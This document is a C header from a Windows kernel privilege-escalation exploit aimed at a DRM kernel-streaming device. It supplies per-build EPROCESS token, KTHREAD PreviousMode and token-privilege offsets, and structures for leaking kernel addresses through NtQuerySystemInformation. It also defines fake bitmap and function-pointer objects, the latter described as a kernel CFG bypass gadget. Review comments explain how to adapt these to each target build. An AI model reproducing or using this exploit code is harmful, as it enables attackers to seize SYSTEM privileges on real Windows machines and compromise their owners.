#pragma once

// Pseudo-handle for the calling process (the well-known -1 value); usable
// wherever a process handle for the current process is required.
#define NtCurrentProcess() ((HANDLE)(LONG_PTR)-1)

// Default kernel object offsets used by the exploit. They are build-specific:
// the values here match the Win10 2004 / 20H2 / Win11 22H2 entries of the
// per-version tables further down in this header (0x4b8 / 0x232 / 0x40).
// On any other build these must be adjusted first, otherwise the arbitrary
// read/write lands on the wrong field of EPROCESS / KTHREAD / TOKEN.
#define EPROCESS_TOKEN_OFFSET 0x4B8
#define KTHREAD_PREVIOUS_MODE_OFFSET 0x232
// NOTE(review): unlike the three offsets around it, this one has no
// per-version table below - confirm it against the target build's symbols.
#define EPROCESS_SECURE_STATE_OFFSET 0x3E0
#define SEP_TOKEN_PRIVILEGE_OFFSET 0x40

// SYSTEM_INFORMATION_CLASS values, presumably passed to
// NtQuerySystemInformation: 0x10 (16) is SystemHandleInformation and 11 is
// SystemModuleInformation (mixed radix is historical, both are decimal
// class numbers).
#define SystemHandleInformation 0x10
#define SystemModuleInformation 11
// 4 MiB buffer, presumably the initial allocation for the
// SystemHandleInformation query. NOTE(review): the live handle table can
// outgrow this on busy hosts; confirm the caller retries with a larger
// buffer on STATUS_INFO_LENGTH_MISMATCH rather than treating it as fatal.
#define SystemHandleInformationSize 0x400000
// KPROCESSOR_MODE values as stored in the KTHREAD.PreviousMode byte that
// KTHREAD_PREVIOUS_MODE_OFFSET addresses. The exploit presumably flips that
// byte from UserMode (1) to KernelMode (0) so that Nt* services treat the
// calling thread's buffers as trusted kernel pointers. Enumerators rely on
// the implicit 0/1 numbering.
enum _MODE
{
    KernelMode,
    UserMode
};
// One entry of the SystemModuleInformation query (the loaded kernel-module
// list). The exploit presumably uses ImageBaseAddress / Name to find
// ntoskrnl.exe and compute kernel addresses. This mirrors the undocumented
// RTL_PROCESS_MODULE_INFORMATION layout: the Reserved fields (plus alignment
// padding on x64, hence the _WIN64-only Reserved3) stand in for the Section
// handle and MappedBase pointer that precede ImageBase in that definition.
typedef struct SYSTEM_MODULE {
    ULONG Reserved1;
    ULONG Reserved2;
#ifdef _WIN64
    ULONG Reserved3;
#endif
    PVOID ImageBaseAddress;   // kernel-mode base address of the module
    ULONG ImageSize;
    ULONG Flags;
    WORD Id;                  // LoadOrderIndex in the phnt definition (from memory - confirm)
    WORD Rank;                // InitOrderIndex in the phnt definition
    WORD w018;                // LoadCount in the phnt definition
    WORD NameOffset;          // offset into Name of the bare file name, past the directory part
    CHAR Name[255];           // full path. NOTE(review): the canonical field is 256 bytes; the
                              // missing byte falls into the struct's tail padding, so the array
                              // stride in SYSTEM_MODULE_INFORMATION is unaffected, but do not
                              // assume Name is NUL-terminated within 255 bytes.
}SYSTEM_MODULE, * PSYSTEM_MODULE;
// Header of the SystemModuleInformation result: a count followed by the
// entries. Modules[1] is the classic Windows variable-length trailer, not a
// one-element array: the buffer must be sized for ModulesCount entries and
// indexed only up to ModulesCount - 1.
typedef struct SYSTEM_MODULE_INFORMATION {
    ULONG ModulesCount;
    SYSTEM_MODULE Modules[1];
} SYSTEM_MODULE_INFORMATION, * PSYSTEM_MODULE_INFORMATION;
// One entry of the (non-extended) SystemHandleInformation query. The exploit
// presumably walks these to resolve the kernel address (Object) behind a
// handle it owns. NOTE(review): UniqueProcessId and HandleValue are only
// 16 bits wide in this info class, so on hosts where PIDs or handle values
// exceed 0xFFFF a match on them is ambiguous; SystemExtendedHandleInformation
// returns ULONG_PTR-sized fields and avoids that.
typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO
{
    USHORT UniqueProcessId;        // owning PID, truncated to 16 bits
    USHORT CreatorBackTraceIndex;
    UCHAR ObjectTypeIndex;         // object type index (process, thread, ...)
    UCHAR HandleAttributes;
    USHORT HandleValue;            // handle value, truncated to 16 bits
    PVOID Object;                  // kernel address of the referenced object
    ULONG GrantedAccess;           // access mask granted at open time
} SYSTEM_HANDLE_TABLE_ENTRY_INFO, *PSYSTEM_HANDLE_TABLE_ENTRY_INFO;
// Header of the SystemHandleInformation result: a count followed by the
// entries. Handles[1] is the classic Windows variable-length trailer; the
// receiving buffer (SystemHandleInformationSize) must hold NumberOfHandles
// entries and the array must be indexed only up to NumberOfHandles - 1.
typedef struct _SYSTEM_HANDLE_INFORMATION
{
    ULONG NumberOfHandles;
    SYSTEM_HANDLE_TABLE_ENTRY_INFO Handles[1];
} SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION;
// Turn a 64-bit integer (typically a kernel address read from the system
// module / handle lists) into a pointer. The conversion goes through
// ULONG_PTR so it is well-defined for the build's pointer width; on a
// 32-bit build ULONG_PTR is presumably narrower than the input and the high
// 32 bits are silently dropped, so use only on x64 as the name implies.
__inline void * ULongLongToPtr64( const unsigned long long ull )
{
    const ULONG_PTR pointerSized = (ULONG_PTR)ull;
    return (void *)pointerSized;
}
//
// Declare some functions from ntdll.dll
//
// Presumably resolved at link time against ntdll.lib. None of them carries
// NTAPI; that is harmless on x64, which has a single calling convention, but
// an x86 build would need __stdcall on each declaration.
//
extern "C"
{
    // Parses a "{xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx}" string into a GUID.
    NTSTATUS RtlGUIDFromString(PUNICODE_STRING GuidString, GUID* Guid);
    // Formats a GUID into a UNICODE_STRING. Per the DDK this allocates the
    // string buffer, so the caller owns it and releases it with
    // RtlFreeUnicodeString - confirm the call site does.
    NTSTATUS RtlStringFromGUID(REFGUID Guid, PUNICODE_STRING GuidString);
    // Makes ThreadHandle impersonate the security context of
    // ThreadToImpersonate, subject to SecurityQualityOfService.
    NTSTATUS NtImpersonateThread(HANDLE ThreadHandle, HANDLE ThreadToImpersonate, SECURITY_QUALITY_OF_SERVICE* SecurityQualityOfService);
    // NOTE(review): the canonical prototype (phnt / ReactOS) takes SIZE_T
    // NumberOfBytesToWrite and PSIZE_T NumberOfBytesWritten. With the
    // ULONG/PULONG spelling below, passing the address of a ULONG as the
    // last argument lets the kernel store 8 bytes into a 4-byte local on
    // x64. Callers should pass NULL, or the address of a SIZE_T-sized
    // variable cast to PULONG, until the declaration is corrected.
    NTSTATUS NtWriteVirtualMemory(HANDLE ProcessHandle, PVOID BaseAddress, PVOID Buffer, ULONG NumberOfBytesToWrite, PULONG NumberOfBytesWritten OPTIONAL );
}
// Device interface path the exploit opens. The "\\?\" prefix selects the
// Win32 device namespace and the "root#system#0000#{...}" part is the
// symbolic-link form of a device interface under the root\system enumerator;
// the first GUID is the interface class, the trailing "{..}&{..}" pair the
// reference string. NOTE(review): the instance/reference part may differ
// between machines - verify the link exists on the target (e.g. with WinObj
// or SetupDiEnumDeviceInterfaces) before relying on the hard-coded string.
#define DRM_DEVICE_OBJECT L"\\\\?\\root#system#0000#{ffbb6e3f-ccfe-4d84-90d9-421418b03a8e}\\{eec12db6-ad9c-4168-8658-b03daef417fe}&{abd61e00-9350-47e2-a632-4438b90c6641}"
// Kernel-streaming (KS) GUIDs kept for reference; nothing in this header
// uses them.
//DEFINE_GUIDSTRUCT("3C0D501A-140B-11D1-B40F-00A0C9223196", KSNAME_Server);
//#define KSNAME_Server DEFINE_GUIDNAMED(KSNAME_Server)
//DEFINE_GUIDSTRUCT("3C0D501B-140B-11D1-B40F-00A0C9223196", KSPROPSETID_Service);
//#define KSPROPSETID_Service DEFINE_GUIDNAMED(KSPROPSETID_Service)
//
// Declare data structures related to the exploit
//
// User-mode copy of the kernel RTL_BITMAP header (ULONG SizeOfBitMap,
// PULONG Buffer in the DDK; the DWORD/PVOID spelling here should give the
// same size and offsets on both 32- and 64-bit builds). A fake instance of
// this is what EXPLOIT_DATA1.FakeBitmap points at, so SizeOfBitMap and
// Buffer are attacker-chosen and drive whatever Rtl*Bits routine the gadget
// ends up calling (e.g. the RtlSetAllBits mentioned below). It is declared
// before the pack(1) pragma, so it keeps natural alignment.
typedef struct _RTL_BITMAP
{
    DWORD SizeOfBitMap;   // number of bits the Buffer is claimed to hold
    PVOID Buffer;         // bit storage; with a fake bitmap this is the write target
}RTL_BITMAP, *PRTL_BITMAP;
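// The exploit-data structures are packed so their layout is exactly what the
// kernel-side code path expects. Use push/pop so the packing does not leak
// into every declaration that follows this header in the including
// translation unit: a bare `#pragma pack(1)` stays in effect until the end
// of the TU and would silently change the layout of any later struct
// (including SDK structs included after this file). Both structs here have
// the same size and offsets with or without packing (one pointer; 0x20 bytes
// followed by a naturally aligned pointer), so this is a pure hygiene fix.
#pragma pack(push, 1)

// First fake object: a single pointer to an attacker-controlled RTL_BITMAP.
typedef struct _EXPLOIT_DATA1
{
    PRTL_BITMAP FakeBitmap;   // caller-built RTL_BITMAP (see _RTL_BITMAP above)
}EXPLOIT_DATA1;

// Second fake object: 0x20 bytes of filler followed by a function pointer at
// offset 0x20, presumably the slot an indirect call in the vulnerable code
// path reads.
typedef struct _EXPLOIT_DATA2
{
    char pad[0x20];
    PVOID ptr_ArbitraryFunCall; // kCFG bypass gadget function, for example RtlSetAllBits
} EXPLOIT_DATA2;

#pragma pack(pop)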
//
// Kernel object offsets for different Windows versions to maintain exploit
// compatibility
//
// EPROCESS.Token offset per Windows build, keyed by marketing name and build
// number. The default EPROCESS_TOKEN_OFFSET macro at the top of this header
// corresponds to the 0x4b8 entries. NOTE(review): this table stops at Win11
// 22H2 (22621) while TOKEN_PRIVILEGES_OFFSET below also lists 23H2 (22631);
// check the token offset for 23H2 against symbols before running there.
enum EPROCESS_TOKEN_OFFSETS
{
    EPROCESS_TOKEN_WIN_SERVER2012_62_9200 = 0x348,
    EPROCESS_TOKEN_WIN_10_1507_10240 = 0x358,
    EPROCESS_TOKEN_WIN_10_1903_18362 = 0x360,
    EPROCESS_TOKEN_WIN_10_2004_19041 = 0x4b8,   // 2004, 20H2 and Win11 22H2 share this offset
    EPROCESS_TOKEN_WIN_10_20H2_19042 = 0x4b8,
    EPROCESS_TOKEN_WIN_11_22H2_22621 = 0x4b8,
};
// KTHREAD.PreviousMode byte offset per build; the default
// KTHREAD_PREVIOUS_MODE_OFFSET macro at the top of this header is 0x232 as
// well. NOTE(review): only three builds are listed here, and the Win10
// 1507/1903 entries present in EPROCESS_TOKEN_OFFSETS have no counterpart;
// builds not in this table need the offset verified against symbols, since
// writing the wrong KTHREAD byte will crash the box rather than fail cleanly.
enum KTHREAD_PREVIOUS_MODE_OFFSETS
{
    PREV_MODE_WIN_SERVER2012_62_9200 = 0x232,
    PREV_MODE_WIN_10_20H2_19042 = 0x232,
    PREV_MODE_WIN_11_22H2_22621 = 0x232,
};
// Offset of the SEP_TOKEN_PRIVILEGES block inside a TOKEN object per build;
// the default SEP_TOKEN_PRIVILEGE_OFFSET macro at the top of this header is
// the same 0x40. This is presumably the field the exploit overwrites to grant
// privileges to its own token. NOTE(review): 23H2 (22631) appears only in
// this table and not in EPROCESS_TOKEN_OFFSETS, so a 23H2 target still needs
// the EPROCESS offset confirmed separately.
enum TOKEN_PRIVILEGES_OFFSET
{
    TOKEN_PRIV_WIN_10_1507_10240 = 0x40,
    TOKEN_PRIV_WIN_11_22H2_22621 = 0x40,
    TOKEN_PRIV_WIN_11_23H2_22631 = 0x40,
};